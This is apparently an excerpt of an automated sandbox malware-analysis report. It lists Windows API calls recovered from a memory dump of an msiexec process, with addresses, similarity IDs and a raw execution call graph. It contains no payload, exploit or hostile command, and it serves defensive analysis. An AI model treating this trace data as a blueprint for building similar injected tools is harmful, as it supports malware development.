                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3727323765-0
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$CloseHandle
                                                                                                      • String ID: General
                                                                                                      • API String ID: 3722638380-26480598
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 764393265-0
                                                                                                      APIs
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                      • String ID:
                                                                                                      • API String ID: 979780441-0
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                      • String ID:
                                                                                                      • API String ID: 1386444988-0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: InvalidateMessageRectSend
                                                                                                      • String ID: d=E
                                                                                                      • API String ID: 909852535-3703654223
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                      • String ID: "
                                                                                                      • API String ID: 1983396471-123907689
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                      • String ID: URL
                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                      APIs
                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                      • String ID: %2.2X
                                                                                                      • API String ID: 2789212964-323797159
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf
                                                                                                      • String ID: %%-%d.%ds
                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendmemset
                                                                                                      • String ID: F^@
                                                                                                      • API String ID: 568519121-3652327722
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: PlacementWindowmemset
                                                                                                      • String ID: WinPos
                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: ??3@DeleteObject
                                                                                                      • String ID: r!A
                                                                                                      • API String ID: 1103273653-628097481
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                      • String ID: _lng.ini
                                                                                                      • API String ID: 383090722-1948609170
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                      • API String ID: 2773794195-880857682
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 438689982-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1860491036-0
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 726966127-0
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                      • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 726966127-0
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 231171946-0
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                      • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3669619086-0
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1033339047-0
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2605342592-0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1961120804-0

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.1%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0.5%
                                                                                                      Total number of Nodes:762
                                                                                                      Total number of Limit Nodes:20
33437->33427 33524 409c1c 33438->33524 33441 401e69 memset 33563 410dbb 33441->33563 33444 401ec2 33587 4070e3 strlen _mbscat _mbscpy _mbscat 33444->33587 33445 401ed4 33576 406f81 GetFileAttributesA 33445->33576 33448 401ee6 strlen strlen 33450 401f15 33448->33450 33451 401f28 33448->33451 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33450->33588 33577 406f81 GetFileAttributesA 33451->33577 33454 401f35 33578 401c31 33454->33578 33457 401f75 33459 402165 33457->33459 33460 401f9c memset 33457->33460 33458 401c31 5 API calls 33458->33457 33462 402195 ExpandEnvironmentStringsA 33459->33462 33463 4021a8 _strcmpi 33459->33463 33589 410b62 RegEnumKeyExA 33460->33589 33595 406f81 GetFileAttributesA 33462->33595 33463->33360 33463->33361 33465 401fd9 atoi 33466 401fef memset memset sprintf 33465->33466 33472 401fc9 33465->33472 33590 410b1e 33466->33590 33469 402076 memset memset strlen strlen 33469->33472 33470 4070e3 strlen _mbscat _mbscpy _mbscat 33470->33472 33471 4020dd strlen strlen 33471->33472 33472->33459 33472->33465 33472->33469 33472->33470 33472->33471 33473 406f81 GetFileAttributesA 33472->33473 33474 402167 _mbscpy 33472->33474 33594 410b62 RegEnumKeyExA 33472->33594 33473->33472 33474->33459 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33613 33480->33479 33606 409b31 33481->33606 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33616 406c62 LoadCursorA SetCursor 33486->33616 33488 40ba8c 33617 403c16 33488->33617 33683 404734 33488->33683 33691 404785 33488->33691 33694 4107f1 33488->33694 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33697 40b5e5 10 API calls 33492->33697 33493 40bafa SetCursor 33493->33367 33495->33493 
33496 40baf1 qsort 33495->33496 33496->33493 33990 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33501->33990 33503 40b00e 33504 40b016 33503->33504 33505 40b01f GetStdHandle 33503->33505 33991 406d1a CreateFileA 33504->33991 33507 40b01c 33505->33507 33508 40b035 33507->33508 33509 40b12d 33507->33509 33992 406c62 LoadCursorA SetCursor 33508->33992 33996 406d77 9 API calls 33509->33996 33512 40b136 33523 40c580 28 API calls 33512->33523 33513 40b042 33514 40b087 33513->33514 33520 40b0a1 33513->33520 33993 40a57c strlen WriteFile 33513->33993 33514->33520 33994 40a699 12 API calls 33514->33994 33517 40b0d6 33518 40b116 CloseHandle 33517->33518 33519 40b11f SetCursor 33517->33519 33518->33519 33519->33512 33520->33517 33995 406d77 9 API calls 33520->33995 33522->33361 33523->33364 33536 409a32 33524->33536 33527 409c80 memcpy memcpy 33530 409cda 33527->33530 33528 408db6 12 API calls 33528->33530 33529 409d18 ??2@YAPAXI ??2@YAPAXI 33531 409d54 ??2@YAPAXI 33529->33531 33534 409d8b 33529->33534 33530->33527 33530->33528 33530->33529 33531->33534 33546 409b9c 33534->33546 33535 4023c1 33535->33441 33537 409a44 33536->33537 33538 409a3d ??3@YAXPAX 33536->33538 33539 409a52 33537->33539 33540 409a4b ??3@YAXPAX 33537->33540 33538->33537 33541 409a63 33539->33541 33542 409a5c ??3@YAXPAX 33539->33542 33540->33539 33543 409a83 ??2@YAPAXI ??2@YAPAXI 33541->33543 33544 409a73 ??3@YAXPAX 33541->33544 33545 409a7c ??3@YAXPAX 33541->33545 33542->33541 33543->33527 33544->33545 33545->33543 33547 407a55 free 33546->33547 33548 409ba5 33547->33548 33549 407a55 free 33548->33549 33550 409bad 33549->33550 33551 407a55 free 33550->33551 33552 409bb5 33551->33552 33553 407a55 free 33552->33553 33554 409bbd 33553->33554 33555 407a1f 4 API calls 33554->33555 33556 409bd0 33555->33556 33557 407a1f 4 API calls 33556->33557 33558 409bda 33557->33558 33559 407a1f 4 API calls 33558->33559 33560 409be4 33559->33560 33561 407a1f 4 API calls 33560->33561 33562 409bee 33561->33562 33562->33535 33564 
410d0e 2 API calls 33563->33564 33565 410dca 33564->33565 33566 410dfd memset 33565->33566 33596 4070ae 33565->33596 33569 410e1d 33566->33569 33570 410e7f _mbscpy 33569->33570 33599 410d3d _mbscpy 33569->33599 33571 401e9e strlen strlen 33570->33571 33571->33444 33571->33445 33573 410e5b 33600 410add RegQueryValueExA 33573->33600 33575 410e73 33575->33570 33576->33448 33577->33454 33579 401c4c 33578->33579 33586 401ca1 33579->33586 33601 410add RegQueryValueExA 33579->33601 33581 401c6a 33582 401c71 strchr 33581->33582 33581->33586 33583 401c85 strchr 33582->33583 33582->33586 33584 401c94 33583->33584 33583->33586 33602 406f06 strlen 33584->33602 33586->33457 33586->33458 33587->33445 33588->33451 33589->33472 33591 410b34 33590->33591 33592 410b4c 33591->33592 33605 410add RegQueryValueExA 33591->33605 33592->33472 33594->33472 33595->33463 33597 4070bd GetVersionExA 33596->33597 33598 4070ce 33596->33598 33597->33598 33598->33566 33598->33571 33599->33573 33600->33575 33601->33581 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33586 33605->33592 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33485 33615 409868 SendMessageA 33611->33615 33613->33481 33614->33609 33615->33610 33616->33488 33618 4107f1 FreeLibrary 33617->33618 33619 403c30 LoadLibraryA 33618->33619 33620 403c74 33619->33620 33621 403c44 GetProcAddress 33619->33621 33623 4107f1 FreeLibrary 33620->33623 33621->33620 33622 403c5e 33621->33622 33622->33620 33627 403c6b 33622->33627 33624 403c7b 33623->33624 33625 404734 3 API calls 33624->33625 33626 403c86 33625->33626 33698 4036e5 33626->33698 33627->33624 33630 4036e5 27 API calls 33631 403c9a 33630->33631 33632 4036e5 27 API calls 33631->33632 33633 403ca4 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403cae 33634->33635 33710 4085d2 33635->33710 33641 403cd2 33643 403cf7 33641->33643 33862 
402bd1 37 API calls 33641->33862 33644 403d1c 33643->33644 33863 402bd1 37 API calls 33643->33863 33745 402c5d 33644->33745 33648 4070ae GetVersionExA 33649 403d31 33648->33649 33651 403d61 33649->33651 33864 402b22 42 API calls 33649->33864 33653 403d97 33651->33653 33865 402b22 42 API calls 33651->33865 33654 403dcd 33653->33654 33866 402b22 42 API calls 33653->33866 33757 410808 33654->33757 33658 404785 FreeLibrary 33659 403de8 33658->33659 33761 402fdb 33659->33761 33662 402fdb 29 API calls 33663 403e00 33662->33663 33773 4032b7 33663->33773 33672 403e3b 33674 403e73 33672->33674 33675 403e46 _mbscpy 33672->33675 33820 40fb00 33674->33820 33868 40f334 333 API calls 33675->33868 33684 404785 FreeLibrary 33683->33684 33685 40473b LoadLibraryA 33684->33685 33686 40474c GetProcAddress 33685->33686 33687 40476e 33685->33687 33686->33687 33688 404764 33686->33688 33689 404781 33687->33689 33690 404785 FreeLibrary 33687->33690 33688->33687 33689->33490 33690->33689 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33490 33693->33692 33695 410807 33694->33695 33696 4107fc FreeLibrary 33694->33696 33695->33490 33696->33695 33697->33492 33699 4037c5 33698->33699 33700 4036fb 33698->33700 33699->33630 33869 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33700->33869 33702 40370e 33702->33699 33703 403716 strchr 33702->33703 33703->33699 33704 403730 33703->33704 33870 4021b6 memset 33704->33870 33706 40373f _mbscpy _mbscpy strlen 33707 4037a4 _mbscpy 33706->33707 33708 403789 sprintf 33706->33708 33871 4023e5 16 API calls 33707->33871 33708->33707 33711 4085e2 33710->33711 33872 4082cd 11 API calls 33711->33872 33713 4085ec 33714 403cba 33713->33714 33715 40860b memset 33713->33715 33722 40821d 33714->33722 33874 410b62 RegEnumKeyExA 33715->33874 33717 408637 33717->33714 33718 40865c memset 33717->33718 33876 40848b 10 API calls 